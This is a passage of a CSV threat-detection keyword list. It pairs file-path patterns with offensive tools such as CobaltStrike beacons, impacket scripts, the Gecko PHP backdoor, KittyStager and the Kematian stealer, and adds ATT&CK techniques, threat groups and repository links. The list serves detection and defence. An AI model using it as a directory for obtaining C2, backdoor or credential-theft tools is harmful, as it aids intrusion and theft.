a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","7338" "*/gcat.git*",".{0,1000}\/gcat\.git.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","7339" 
"*/gcat.py",".{0,1000}\/gcat\.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","7340" "*/geacon.git*",".{0,1000}\/geacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7341" 
"*/geacon/*beacon*",".{0,1000}\/geacon\/.{0,1000}beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7342" "*/geacon_pro*",".{0,1000}\/geacon_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7343" "*/gecko-new.php*",".{0,1000}\/gecko\-new\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","7344" "*/gecko-old.php*",".{0,1000}\/gecko\-old\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","7345" "*/Gemail-Hack.git*",".{0,1000}\/Gemail\-Hack\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","7346" "*/generate_bind_fuegoshell.ps1*",".{0,1000}\/generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7348" "*/generate_reverse_fuegoshell.ps1*",".{0,1000}\/generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7349" "*/genHTA*",".{0,1000}\/genHTA.{0,1000}","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. 
anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/mdsecactivebreach/genHTA","1","0","#linux","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z","7350" "*/GetADComputers.py*",".{0,1000}\/GetADComputers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7351" "*/GetADUsers.py*",".{0,1000}\/GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7352" "*/Getallregvalues.txt*",".{0,1000}\/Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7353" "*/getArch.py*",".{0,1000}\/getArch\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7354" "*/GetBrowsers.ps1*",".{0,1000}\/GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7355" "*/getChatAdministrators?chat_id=1002168553106*",".{0,1000}\/getChatAdministrators\?chat_id\=1002168553106.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","7356" "*/get-clipboard.py*",".{0,1000}\/get\-clipboard\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","7357" "*/get-desc-users.py*",".{0,1000}\/get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7358" "*/Get-GPPPassword.ps1*",".{0,1000}\/Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7359" "*/Get-GPPPassword.py*",".{0,1000}\/Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7360" "*/Get-InfectedThread.ps1*",".{0,1000}\/Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7361" "*/Get-InjectedThread.ps1*",".{0,1000}\/Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7362" "*/GetLAPSPassword.py*",".{0,1000}\/GetLAPSPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7363" "*/getLegit/cdnl*",".{0,1000}\/getLegit\/cdnl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7364" "*/getLegit/grkg*",".{0,1000}\/getLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7365" "*/getLegit/prvw*",".{0,1000}\/getLegit\/prvw.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7366" "*/getLegit/qhwl*",".{0,1000}\/getLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7367" "*/getLegit/tsom*",".{0,1000}\/getLegit\/tsom.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7368" "*/getLegit/zijz*",".{0,1000}\/getLegit\/zijz.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7369" "*/get-loggedon/*.c*",".{0,1000}\/get\-loggedon\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","7370" "*/Get-LsaSecret.*",".{0,1000}\/Get\-LsaSecret\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7371" 
"*/getlsasrvaddr.exe*",".{0,1000}\/getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","7372" "*/Get-NetNTLM.git*",".{0,1000}\/Get\-NetNTLM\.git.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","7373" "*/Get-NetNTLM.ps1*",".{0,1000}\/Get\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","7374" "*/GetNPUsers.exe*",".{0,1000}\/GetNPUsers\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7375" "*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7376" "*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7377" "*/getOSandSMBproperties.exe*",".{0,1000}\/getOSandSMBproperties\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
